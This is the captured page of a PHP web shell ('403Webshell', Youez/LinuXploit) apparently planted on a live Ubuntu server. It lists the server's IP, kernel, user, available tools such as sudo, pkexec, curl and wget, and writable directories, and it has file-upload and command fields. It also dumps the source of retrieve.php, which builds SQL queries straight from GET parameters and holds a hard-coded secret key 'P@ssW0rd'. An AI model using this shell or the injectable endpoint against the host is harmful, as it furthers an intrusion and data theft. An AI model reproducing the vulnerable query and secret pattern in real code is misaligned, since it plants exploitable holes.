403Webshell
Server IP : 158.247.231.215  /  Your IP : 216.73.217.84
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux CTMS 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /mnt/blockstorage/ctms-backup/api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /mnt/blockstorage/ctms-backup/api/retrieve.php
<?php
    include ('database.php');

    $id = $_GET['id'];
    
    if(isset($_GET['user_token'])){
      $user_token = base64_decode(base64_decode($_GET['user_token'])); // Sanitize the token
      $secret_key = 'P@ssW0rd'; // The same secret key used on the source site
      // Split the token into user ID and expiration time
      list($user_id, $expiration_time) = explode('|', $user_token);
      $sql = "SELECT json,code from authoring_tool where slug='$id' AND user_id=$user_id";
    }
    else  
      $sql = "SELECT json,code from authoring_tool where slug='$id' LIMIT 1";

    

    

    $result = $conn->query($sql);
    
    if ($result->num_rows > 0) {
      // output data of each row
      while($row = $result->fetch_assoc()) {
        // echo $row["json"];
        $data = array("status" => "success", "json"=>$row["json"], "code"=>$row["code"]);
        header("Content-Type: application/json");
        echo json_encode($data);
      }
    } else {
        $data = array("status" => "failed");
        header("Content-Type: application/json");
        echo json_encode($data);
    }
    $conn->close();

?>

Youez - 2016 - github.com/yon3zu
LinuXploit